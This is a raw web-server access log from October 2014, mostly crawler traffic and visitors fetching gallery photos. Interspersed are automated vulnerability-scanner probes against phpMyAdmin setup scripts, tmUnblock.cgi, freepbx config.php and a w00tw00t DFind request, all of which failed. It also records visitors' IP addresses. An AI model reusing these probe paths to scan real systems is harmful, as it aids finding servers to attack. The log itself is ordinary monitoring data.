[26/Oct/2014:12:26:35 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.140 - - [26/Oct/2014:12:26:54 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +66.249.69.165 - - [26/Oct/2014:12:52:20 +0200] "GET /robots.txt HTTP/1.1" 404 446 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" +66.249.69.181 - - [26/Oct/2014:12:52:21 +0200] "GET /ftp/public/pictures/gallery/IMG_8308_small.jpg HTTP/1.1" 304 189 "-" "Googlebot-Image/1.0" +95.173.166.182 - - [26/Oct/2014:14:11:07 +0200] "GET /nxnx/nxn/nx.php HTTP/1.1" 404 416 "-" "-" +95.173.166.182 - - [26/Oct/2014:14:11:07 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 429 "-" "-" +95.173.166.182 - - [26/Oct/2014:14:11:07 +0200] "GET /pma/scripts/setup.php HTTP/1.1" 404 422 "-" "-" +95.173.166.182 - - [26/Oct/2014:14:11:08 +0200] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 426 "-" "-" +220.181.108.144 - - [26/Oct/2014:14:14:21 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.106 - - [26/Oct/2014:14:15:23 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +66.249.93.68 - - [26/Oct/2014:14:50:26 +0200] "GET /ftp/public/pictures/gallery/calmsun_rdct.jpg HTTP/1.1" 200 571914 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0 (via ggpht.com GoogleImageProxy)" +220.181.108.159 - - [26/Oct/2014:15:13:20 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.83 - - [26/Oct/2014:15:13:58 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.146 - - [26/Oct/2014:16:06:06 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.75 - - [26/Oct/2014:16:18:57 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.143 - - [26/Oct/2014:17:01:40 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.95 - - [26/Oct/2014:17:06:26 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.151 - - [26/Oct/2014:18:07:13 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.104 - - [26/Oct/2014:18:10:53 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +87.92.228.114 - - [26/Oct/2014:18:22:21 +0200] "GET /ftp/public/pictures/xperia_amazonbill.jpg HTTP/1.1" 200 45010 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0" +123.125.71.90 - - [26/Oct/2014:19:27:25 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.185 - - [26/Oct/2014:19:29:08 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +207.46.13.106 - - [26/Oct/2014:20:20:58 +0200] "GET /robots.txt HTTP/1.1" 404 448 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" +207.46.13.106 - - [26/Oct/2014:20:21:03 +0200] "GET /ftp/public/pictures/gallery/ndrbrdg_rdct.jpg HTTP/1.1" 200 198113 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" +157.55.39.41 - - [26/Oct/2014:20:21:13 +0200] "GET /ftp/public/pictures/gallery/barnaclegoose_02_rdct.jpg HTTP/1.1" 200 106829 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" +157.55.39.47 - - [26/Oct/2014:20:44:26 +0200] "GET /ftp/public/pictures/gallery/nightsky1_rdct.jpg HTTP/1.1" 200 205426 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" +220.181.108.146 - - [26/Oct/2014:20:46:58 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.88 - - [26/Oct/2014:20:48:16 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +157.55.39.160 - - [26/Oct/2014:20:51:46 +0200] "GET /ftp/public/pictures/gallery/shpcntr1_rdct.jpg HTTP/1.1" 200 1153694 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" +122.155.197.190 - - [26/Oct/2014:20:52:36 +0200] "GET /fdfd/fdf/fd.php HTTP/1.1" 404 416 "-" "-" +122.155.197.190 - - [26/Oct/2014:20:52:37 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 429 "-" "-" +122.155.197.190 - - [26/Oct/2014:20:52:37 +0200] "GET /pma/scripts/setup.php HTTP/1.1" 404 422 "-" "-" +122.155.197.190 - - [26/Oct/2014:20:52:38 +0200] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 426 "-" "-" +157.55.39.47 - - [26/Oct/2014:21:00:25 +0200] "GET /ftp/public/pictures/lightpollution_before.png HTTP/1.1" 200 938471 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" +157.55.39.160 - - [26/Oct/2014:21:04:37 +0200] "GET /ftp/public/pictures/photoshop_tests/apinakuva.jpg HTTP/1.1" 200 96773 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" +207.46.13.106 - - [26/Oct/2014:21:10:04 +0200] "GET /ftp/public/pictures/gallery/barnaclegoose_01_rdct.jpg HTTP/1.1" 200 80495 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" +207.46.13.106 - - [26/Oct/2014:21:10:14 +0200] "GET /ftp/public/pictures/gallery/barnaclegoose_01_rdct.jpg HTTP/1.1" 200 80495 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" +207.46.13.106 - - [26/Oct/2014:21:12:45 +0200] "GET /ftp/public/pictures/gallery/barnaclegoose_01_rdct.jpg HTTP/1.1" 200 80495 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" +207.46.13.106 - - [26/Oct/2014:21:13:10 +0200] "GET /ftp/public/pictures/gallery/barnaclegoose_01_rdct.jpg HTTP/1.1" 200 80495 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" +207.46.13.106 - - [26/Oct/2014:21:13:20 +0200] "GET /ftp/public/pictures/gallery/barnaclegoose_01_rdct.jpg HTTP/1.1" 200 80495 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" +157.55.39.41 - - [26/Oct/2014:21:13:29 +0200] "GET /ftp/public/pictures/gallery/winterforest_small.jpg HTTP/1.1" 200 189950 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" +207.46.13.106 - - [26/Oct/2014:21:13:34 +0200] "GET /ftp/public/pictures/gallery/barnaclegoose_01_rdct.jpg HTTP/1.1" 200 80495 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" +157.55.39.41 - - [26/Oct/2014:21:22:28 +0200] "GET /ftp/public/pictures/gallery/shroudedmoon_small.jpg HTTP/1.1" 200 31591 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" +220.181.108.171 - - [26/Oct/2014:21:37:30 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.100 - - [26/Oct/2014:21:38:45 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +192.3.205.154 - - [26/Oct/2014:21:42:26 +0200] "GET /etc/lib/pChart2/examples/index.php HTTP/1.1" 404 416 "-" "-" +85.76.16.167 - - [26/Oct/2014:22:02:51 +0200] "GET /ftp/public/pictures/gallery/glorious_light_small.jpg HTTP/1.1" 200 117763 "https://www.google.fi/" "Mozilla/5.0 (iPad; CPU OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B410 Safari/600.1.4" +220.181.108.159 - - [26/Oct/2014:23:51:15 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.80 - - [26/Oct/2014:23:54:18 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +178.55.4.133 - - [27/Oct/2014:00:04:52 +0200] "GET /ftp/public/pictures/gallery/IMG_0164_2.jpg HTTP/1.1" 200 949690 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.71 (KHTML, like Gecko) Version/6.1 Safari/537.71" +178.55.4.133 - - [27/Oct/2014:00:07:28 +0200] "GET /ftp/public/pictures/gallery/IMG_0164_2.jpg HTTP/1.1" 200 949690 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.71 (KHTML, like Gecko) Version/6.1 Safari/537.71" +157.55.39.160 - - [27/Oct/2014:00:12:08 +0200] "GET /ftp/public/pictures/gallery/flowers02_small.jpg HTTP/1.1" 200 60329 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" +220.181.108.187 - - [27/Oct/2014:00:32:45 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.72 - - [27/Oct/2014:00:37:04 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +85.29.101.102 - - [27/Oct/2014:00:55:12 +0200] "GET /ftp/public/pictures/gallery/cloudymoon_rdct.jpg HTTP/1.1" 200 998391 "https://www.google.fi/" "Mozilla/5.0 (iPad; CPU OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A405 Safari/600.1.4" +220.181.108.172 - - [27/Oct/2014:01:36:11 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.76 - - [27/Oct/2014:01:39:01 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +71.200.144.122 - - [27/Oct/2014:02:04:02 +0200] "GET /tmUnblock.cgi HTTP/1.1" 400 431 "-" "-" +220.181.108.169 - - [27/Oct/2014:02:21:02 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.102 - - [27/Oct/2014:02:22:02 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.116 - - [27/Oct/2014:03:24:49 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.145 - - [27/Oct/2014:03:24:56 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +157.55.39.41 - - [27/Oct/2014:03:48:47 +0200] "GET /ftp/public/pictures/gallery/ndrbrdg_rdct_small.jpg HTTP/1.1" 200 73221 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" +220.181.108.169 - - [27/Oct/2014:04:11:18 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.81 - - [27/Oct/2014:04:12:34 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.108 - - [27/Oct/2014:05:06:58 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.79 - - [27/Oct/2014:05:08:01 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.114 - - [27/Oct/2014:06:03:47 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.184 - - [27/Oct/2014:06:04:24 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.144 - - [27/Oct/2014:07:06:11 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.108 - - [27/Oct/2014:07:06:12 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.150 - - [27/Oct/2014:08:27:08 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.99 - - [27/Oct/2014:08:27:27 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.105 - - [27/Oct/2014:09:21:24 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.162 - - [27/Oct/2014:09:22:22 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +31.172.155.199 - - [27/Oct/2014:10:12:02 +0200] "GET /ftp/public/pictures/gallery/revontulet1_rdct.jpg HTTP/1.1" 200 86268 "https://www.google.fi/" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36" +123.125.71.114 - - [27/Oct/2014:10:26:42 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.149 - - [27/Oct/2014:10:28:03 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.108 - - [27/Oct/2014:11:37:04 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +195.148.210.48 - - [27/Oct/2014:11:44:54 +0200] "GET /ftp/public/pictures/gallery/IMG_0103.jpg HTTP/1.1" 200 930972 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)" +195.148.210.48 - - [27/Oct/2014:11:44:54 +0200] "GET /ftp/public/pictures/gallery/IMG_5737.jpg HTTP/1.1" 200 1087081 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)" +123.125.71.77 - - [27/Oct/2014:13:05:40 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +85.25.43.94 - - [27/Oct/2014:13:34:32 +0200] "GET / HTTP/1.1" 200 460 "-" "-" +85.25.43.94 - - [27/Oct/2014:13:34:33 +0200] "GET /robots.txt HTTP/1.1" 404 392 "-" "-" +123.125.71.98 - - [27/Oct/2014:14:04:19 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +212.149.174.26 - - [27/Oct/2014:14:48:18 +0200] "GET /ftp/public/pictures/gallery/merry_christmas_2013_small.jpg HTTP/1.1" 200 137146 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0" +220.181.108.173 - - [27/Oct/2014:15:16:26 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.109 - - [27/Oct/2014:15:17:32 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +211.24.19.132 - - [27/Oct/2014:15:46:58 +0200] "GET /tmUnblock.cgi HTTP/1.1" 400 431 "-" "-" +220.181.108.161 - - [27/Oct/2014:16:09:11 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.78 - - [27/Oct/2014:16:14:31 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.149 - - [27/Oct/2014:17:03:42 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.94 - - [27/Oct/2014:17:04:29 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.160 - - [27/Oct/2014:18:09:06 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.82 - - [27/Oct/2014:18:10:55 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.178 - - [27/Oct/2014:19:30:36 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.109 - - [27/Oct/2014:19:36:26 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.149 - - [27/Oct/2014:20:35:28 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.80 - - [27/Oct/2014:20:36:29 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +88.192.19.151 - - [27/Oct/2014:20:51:30 +0200] "GET /ftp/public/pictures/gallery/IMG_0103.jpg HTTP/1.1" 200 930972 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0" +77.125.128.147 - - [27/Oct/2014:21:46:22 +0200] "GET / HTTP/1.0" 200 453 "-" "-" +66.249.65.141 - - [27/Oct/2014:22:50:01 +0200] "GET /robots.txt HTTP/1.1" 404 446 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" +66.249.65.141 - - [27/Oct/2014:22:50:01 +0200] "GET /ftp/public/pictures/nightsky_16082014.jpg HTTP/1.1" 200 165746 "-" "Googlebot-Image/1.0" +220.181.108.156 - - [27/Oct/2014:22:55:38 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +88.192.69.68 - - [27/Oct/2014:23:21:29 +0200] "GET /ftp/public/ HTTP/1.1" 200 743 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0" +88.192.69.68 - - [27/Oct/2014:23:21:29 +0200] "GET /icons/blank.gif HTTP/1.1" 200 437 "http://88.192.69.68/ftp/public/" "Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0" +88.192.69.68 - - [27/Oct/2014:23:21:29 +0200] "GET /icons/back.gif HTTP/1.1" 200 506 "http://88.192.69.68/ftp/public/" "Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0" +88.192.69.68 - - [27/Oct/2014:23:21:29 +0200] "GET /icons/unknown.gif HTTP/1.1" 200 535 "http://88.192.69.68/ftp/public/" "Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0" +88.192.69.68 - - [27/Oct/2014:23:21:29 +0200] "GET /icons/folder.gif HTTP/1.1" 200 514 "http://88.192.69.68/ftp/public/" "Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0" +88.192.69.68 - - [27/Oct/2014:23:21:29 +0200] "GET /favicon.ico HTTP/1.1" 404 446 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0" +88.192.69.68 - - [27/Oct/2014:23:21:29 +0200] "GET /favicon.ico HTTP/1.1" 404 446 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0" +88.192.69.68 - - [27/Oct/2014:23:21:31 +0200] "GET /ftp/public/other/ HTTP/1.1" 200 1957 "http://88.192.69.68/ftp/public/" "Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0" +88.192.69.68 - - [27/Oct/2014:23:21:31 +0200] "GET /icons/text.gif HTTP/1.1" 200 519 "http://88.192.69.68/ftp/public/other/" "Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0" +88.192.69.68 - - [27/Oct/2014:23:21:31 +0200] "GET /icons/image2.gif HTTP/1.1" 200 599 "http://88.192.69.68/ftp/public/other/" "Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0" +88.192.69.68 - - [27/Oct/2014:23:21:31 +0200] "GET /icons/compressed.gif HTTP/1.1" 200 1329 "http://88.192.69.68/ftp/public/other/" "Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0" +88.192.69.68 - - [27/Oct/2014:23:21:31 +0200] "GET /icons/layout.gif HTTP/1.1" 200 566 "http://88.192.69.68/ftp/public/other/" "Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0" +88.192.69.68 - - [27/Oct/2014:23:21:48 +0200] "GET /ftp/public/other/GlobalMindedness.pdf HTTP/1.1" 200 990099 "http://88.192.69.68/ftp/public/other/" "Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0" +95.183.244.244 - - [28/Oct/2014:01:32:48 +0200] "GET / HTTP/1.1" 400 431 "-" "-" +220.181.108.186 - - [28/Oct/2014:01:38:35 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.85 - - [28/Oct/2014:01:38:38 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +94.102.49.82 - - [28/Oct/2014:02:04:46 +0200] "GET /freepbx/admin/config.php HTTP/1.0" 404 425 "-" "-" +132.248.99.249 - - [28/Oct/2014:03:04:24 +0200] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 431 "-" "-" +220.181.108.167 - - [28/Oct/2014:04:11:00 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.89 - - [28/Oct/2014:04:12:40 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.96 - - [28/Oct/2014:04:17:44 +0200] "GET /ftp/public/pictures/gallery/IMG_8308_small.jpg HTTP/1.1" 200 97819 "http://image.baidu.com/i?ct=503316480&z=0&tn=baiduimagedetail" "Baiduspider-image+(+http://www.baidu.com/search/spider.htm)" +89.248.162.170 - - [28/Oct/2014:04:23:22 +0200] "GET http://89.248.162.170/headers.php HTTP/1.1" 404 388 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:20.0) Gecko/20100101 Firefox/20.0" +115.29.207.170 - - [28/Oct/2014:04:58:28 +0200] "GET /qpqp/qpq/qp.php HTTP/1.1" 404 416 "-" "-" +115.29.207.170 - - [28/Oct/2014:04:58:29 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 429 "-" "-" +115.29.207.170 - - [28/Oct/2014:04:58:31 +0200] "GET /pma/scripts/setup.php HTTP/1.1" 404 422 "-" "-" +115.29.207.170 - - [28/Oct/2014:04:58:32 +0200] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 426 "-" "-" +220.181.108.167 - - [28/Oct/2014:05:10:35 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.81 - - [28/Oct/2014:05:12:09 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.96 - - [28/Oct/2014:06:06:12 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.173 - - [28/Oct/2014:06:06:13 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.74 - - [28/Oct/2014:07:04:08 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.148 - - [28/Oct/2014:07:05:23 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.179 - - [28/Oct/2014:08:10:44 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.104 - - [28/Oct/2014:08:10:57 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.88 - - [28/Oct/2014:09:13:48 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.143 - - [28/Oct/2014:09:14:58 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.78 - - [28/Oct/2014:10:16:02 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.170 - - [28/Oct/2014:10:17:17 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.106 - - [28/Oct/2014:11:17:35 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.169 - - [28/Oct/2014:11:18:54 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +54.196.162.14 - - [28/Oct/2014:11:52:54 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)" +123.125.71.83 - - [28/Oct/2014:12:36:14 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.155 - - [28/Oct/2014:12:37:39 +0200] "GET / HTTP/1.1" 200 453 